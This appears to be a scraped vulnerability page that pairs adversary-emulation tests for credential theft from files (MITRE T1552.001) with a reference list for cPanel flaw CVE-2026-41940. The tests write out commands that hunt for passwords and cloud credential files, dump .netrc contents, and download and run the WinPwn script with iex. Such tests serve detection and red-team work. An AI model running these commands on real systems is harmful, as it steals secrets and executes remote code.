type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (10)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2026-41940
support.cpanel.net
GitHub CVE vendor-advisory patch
https://support.cpanel.net/hc/en-us/articles/40073787579671-cPanel-WHM-Security-Update-04-28-2026
docs.cpanel.net
GitHub CVE release-notes
https://docs.cpanel.net/release-notes/release-notes
docs.wpsquared.com
GitHub CVE release-notes
https://docs.wpsquared.com/changelogs/versions/changelog/#13617
namecheap.com
GitHub CVE third-party-advisory
https://www.namecheap.com/status-updates/ongoing-critical-security-vulnerability-in-cpanel-april-28-2026
vulncheck.com
GitHub CVE third-party-advisory
https://www.vulncheck.com/advisories/cpanel-and-whm-authentication-bypass-via-login-flow
github.com
NVD API
https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
labs.watchtowr.com
NVD API Exploit Third Party Advisory
https://labs.watchtowr.com/the-internet-is-falling-down-falling-down-falling-down-cpanel-whm-authentication-bypass-cve-2026-41940/
bleepingcomputer.com
NVD API Press/Media Coverage
https://www.bleepingcomputer.com/news/security/critrical-cpanel-flaw-mass-exploited-in-sorry-ransomware-attacks/
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-41940